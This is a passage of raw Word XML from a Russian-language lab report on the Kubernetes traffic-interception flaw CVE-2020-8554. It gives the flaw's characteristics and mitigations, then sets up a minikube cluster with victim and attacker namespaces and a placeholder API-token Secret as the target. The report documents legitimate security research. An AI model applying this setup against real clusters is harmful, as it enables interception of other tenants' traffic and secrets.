              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7712A0ED" w14:textId="73E3A116" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="00C3692D" w:rsidP="00EB590A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C3692D">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>CWE-283</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F7018B" w:rsidRPr="00757DB2" w14:paraId="06E42658" w14:textId="77777777" w:rsidTr="00FF2D6B">
        <w:trPr>
          <w:trHeight w:val="858"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A0AB295" w14:textId="3CA01299" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="00EB590A" w:rsidP="00EB590A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF2D6B">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Затронутые версии</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1771E17D" w14:textId="219481F4" w:rsidR="00FF2D6B" w:rsidRPr="00C3692D" w:rsidRDefault="00C3692D" w:rsidP="00EB590A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Все версии</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F7018B" w:rsidRPr="00C3692D" w14:paraId="16F5401B" w14:textId="77777777" w:rsidTr="00FF2D6B">
        <w:trPr>
          <w:trHeight w:val="872"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="799FBEB4" w14:textId="66A2A6B6" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="00EB590A" w:rsidP="00EB590A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF2D6B">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Исправленная версия</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0063FD33" w14:textId="590CBD3B" w:rsidR="00881F29" w:rsidRPr="006A0C3C" w:rsidRDefault="00C3692D" w:rsidP="00EB590A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Полностью уязвимость не устанена. Признана </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>design</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA223A">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>flaw</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA223A">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F7018B" w14:paraId="5E26B568" w14:textId="77777777" w:rsidTr="00FF2D6B">
        <w:trPr>
          <w:trHeight w:val="937"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59A91696" w14:textId="34987F39" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="00EB590A" w:rsidP="00EB590A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF2D6B">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Основной риск</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46D46B57" w14:textId="26850756" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="006A0C3C" w:rsidP="00FF2D6B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A0C3C">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Пользователь с ограниченными правами внутри кластера может перехватывать трафик от других Pod’ов или нод к выбранному IP-адресу</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F7018B" w14:paraId="52EF948B" w14:textId="77777777" w:rsidTr="00FF2D6B">
        <w:trPr>
          <w:trHeight w:val="937"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E0A3798" w14:textId="63C3BF91" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="00EB590A" w:rsidP="00EB590A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF2D6B">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Основное последствие</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39036968" w14:textId="4AFDADFC" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="006A0C3C" w:rsidP="00EB590A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A0C3C">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Перехват, подмена или нарушение доступности сетевого трафика</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F7018B" w14:paraId="10B80A82" w14:textId="77777777" w:rsidTr="00FF2D6B">
        <w:trPr>
          <w:trHeight w:val="442"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C228990" w14:textId="74EFA639" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="00EB590A" w:rsidP="00EB590A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF2D6B">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Полное устранение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="640436D2" w14:textId="35E5E1E7" w:rsidR="00F7018B" w:rsidRPr="006A0C3C" w:rsidRDefault="006A0C3C" w:rsidP="00EB590A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Запрет использования </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>spec</w:t>
            </w:r>
            <w:r w:rsidRPr="006A0C3C">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>externalIPs</w:t>
            </w:r>
            <w:r w:rsidRPr="006A0C3C">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">Ограничение права </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>patch</w:t>
            </w:r>
            <w:r w:rsidRPr="006A0C3C">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">на </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>services</w:t>
            </w:r>
            <w:r w:rsidRPr="006A0C3C">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>status</w:t>
            </w:r>
            <w:r w:rsidRPr="006A0C3C">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F7018B" w14:paraId="5D7FFBB1" w14:textId="77777777" w:rsidTr="00FF2D6B">
        <w:trPr>
          <w:trHeight w:val="462"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F77C622" w14:textId="6834A74D" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="00EB590A" w:rsidP="00EB590A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF2D6B">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>CVSS 4.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30F90D4C" w14:textId="69238A5D" w:rsidR="00F7018B" w:rsidRPr="006A0C3C" w:rsidRDefault="006A0C3C" w:rsidP="00EB590A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A0C3C">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">6.3 </w:t>
            </w:r>
            <w:r w:rsidRPr="006A0C3C">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>(Medium)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F7018B" w14:paraId="0DDDD20B" w14:textId="77777777" w:rsidTr="00FF2D6B">
        <w:trPr>
          <w:trHeight w:val="462"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11E7A266" w14:textId="422BC631" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="00EB590A" w:rsidP="00EB590A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF2D6B">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Вектор атаки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E4DE882" w14:textId="0E633557" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="00503E3A" w:rsidP="00EB590A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF2D6B">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AB3724A" w14:textId="347ACB2A" w:rsidR="00F7018B" w:rsidRDefault="006A05EA" w:rsidP="00FF2D6B">
      <w:pPr>
        <w:pStyle w:val="-0"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF2D6B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">основные характеристики </w:t>
      </w:r>
      <w:r w:rsidR="006A0C3C" w:rsidRPr="00757DB2">
        <w:t>CVE-2020-8554</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDB6857" w14:textId="77777777" w:rsidR="00134D62" w:rsidRPr="00134D62" w:rsidRDefault="00134D62" w:rsidP="00134D62">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344A4D4A" w14:textId="1747C8D3" w:rsidR="00FA35AF" w:rsidRPr="00791EC8" w:rsidRDefault="00FF2D6B" w:rsidP="00FF2D6B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc231834652"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Подготовка ос для исследования </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF2D6B">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00D344B9" w:rsidRPr="00757DB2">
        <w:t>2020-8554</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="49465351" w14:textId="7A019E9A" w:rsidR="00FF2D6B" w:rsidRDefault="0046152F" w:rsidP="00FF2D6B">
      <w:r>
        <w:t xml:space="preserve">Для создания локального кластера был использован модуль </w:t>
      </w:r>
      <w:r w:rsidR="003059BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>minikube</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, который позволяет создать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="0046152F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">кластер внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidRPr="0046152F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>контейнера.</w:t>
      </w:r>
      <w:r w:rsidR="00F14A0F" w:rsidRPr="00F14A0F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F14A0F">
        <w:t xml:space="preserve">После создания было проверено наличие главной ноды, а также всех </w:t>
      </w:r>
      <w:r w:rsidR="00F14A0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD4FACC" w14:textId="77777777" w:rsidR="00F14A0F" w:rsidRDefault="00F14A0F" w:rsidP="00FF2D6B"/>
    <w:p w14:paraId="2B417DD6" w14:textId="08FCCAA1" w:rsidR="00F14A0F" w:rsidRDefault="00F14A0F" w:rsidP="00F14A0F">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r w:rsidRPr="00F14A0F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64F63BA8" wp14:editId="082B2B91">
            <wp:extent cx="6480175" cy="3535680"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="143289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95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9542" w14:textId="7B32AFBF" w:rsidR="00F14A0F" w:rsidRDefault="00F14A0F" w:rsidP="00F14A0F">
      <w:pPr>
        <w:pStyle w:val="-"/>
      </w:pPr>
      <w:r>
        <w:t>Создание кластера</w:t>
      </w:r>
      <w:r w:rsidR="00311E8D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D3DC67" w14:textId="50E3E073" w:rsidR="005329EA" w:rsidRDefault="005329EA" w:rsidP="00F14A0F"/>
    <w:p w14:paraId="4EF8F7D9" w14:textId="35030034" w:rsidR="005329EA" w:rsidRDefault="005329EA" w:rsidP="00F14A0F">
      <w:r>
        <w:t xml:space="preserve">Далее были созданы 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>namespace</w:t>
      </w:r>
      <w:r w:rsidRPr="005329EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для жертвы и атакующего. Также для последнего создан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>serviceaccount</w:t>
      </w:r>
      <w:r w:rsidRPr="005329EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>с правом на</w:t>
      </w:r>
      <w:r w:rsidRPr="005329EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">управление объектами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586F8AB3" w14:textId="77777777" w:rsidR="005329EA" w:rsidRDefault="005329EA" w:rsidP="00F14A0F"/>
    <w:p w14:paraId="1BF0BCAD" w14:textId="52330F82" w:rsidR="005329EA" w:rsidRDefault="005329EA" w:rsidP="005329EA">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r w:rsidRPr="005329EA">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BE6C6CC" wp14:editId="5AB33755">
            <wp:extent cx="6480175" cy="4616450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="181148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86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E3D4" w14:textId="75F60BE1" w:rsidR="005329EA" w:rsidRDefault="005329EA" w:rsidP="005329EA">
      <w:pPr>
        <w:pStyle w:val="-"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Yaml-</w:t>
      </w:r>
      <w:r>
        <w:t>конфигурация для атакующего</w:t>
      </w:r>
      <w:r w:rsidR="00311E8D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD4F3BD" w14:textId="77777777" w:rsidR="005329EA" w:rsidRPr="005329EA" w:rsidRDefault="005329EA" w:rsidP="005329EA">
      <w:r>
        <w:t xml:space="preserve">В результате проверки возможностей атакующего внутри своего </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>namespace</w:t>
      </w:r>
      <w:r w:rsidRPr="005329EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>namespace</w:t>
      </w:r>
      <w:r w:rsidRPr="005329EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>жертвы</w:t>
      </w:r>
      <w:r w:rsidRPr="005329EA">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3EE441" w14:textId="04C072FB" w:rsidR="005329EA" w:rsidRPr="005329EA" w:rsidRDefault="005329EA" w:rsidP="005329EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005329EA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kubectl auth can-i create services   -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005329EA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n tenant-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{x}</w:t>
      </w:r>
      <w:r w:rsidRPr="005329EA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005329EA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-as=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005329EA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system:serviceaccount</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005329EA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:tenant-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005329EA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b:attacker</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="450D0A05" w14:textId="165A2B01" w:rsidR="005329EA" w:rsidRPr="00AA223A" w:rsidRDefault="005329EA" w:rsidP="005329EA">
      <w:r w:rsidRPr="005329EA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">было установлено, что атакующий имеет права на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidRPr="005329EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">только внутри своего </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>namespace</w:t>
      </w:r>
      <w:r w:rsidRPr="005329EA">
        <w:t>. (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">При </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="005329EA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="005329EA">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>namespace</w:t>
      </w:r>
      <w:r w:rsidRPr="005329EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">жертвы, будет ответ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no</w:t>
      </w:r>
      <w:r w:rsidRPr="005329EA">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">При </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA223A">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA223A">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>namespace</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA223A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">атакующего, будет ответ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA223A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C60F9F" w14:textId="77777777" w:rsidR="00B400B6" w:rsidRPr="00B400B6" w:rsidRDefault="00BD5AEB" w:rsidP="005329EA">
      <w:r>
        <w:t xml:space="preserve">Далее были созданны </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Secret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>-токеном, который необходимо получить</w:t>
      </w:r>
      <w:r w:rsidR="00B400B6" w:rsidRPr="00B400B6">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A9D31A" w14:textId="77777777" w:rsidR="00B400B6" w:rsidRPr="00B400B6" w:rsidRDefault="00B400B6" w:rsidP="00B400B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B400B6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kubectl -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B400B6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n tenant</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B400B6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-a create secret generic payment-api-token \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA18952" w14:textId="77777777" w:rsidR="00B400B6" w:rsidRPr="00B400B6" w:rsidRDefault="00B400B6" w:rsidP="00B400B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B400B6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  --from-literal=API_TOKEN='SECRET_DATA_FROM_TENANT_A'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E97F3BE" w14:textId="03273649" w:rsidR="005329EA" w:rsidRDefault="00B400B6" w:rsidP="00B400B6">
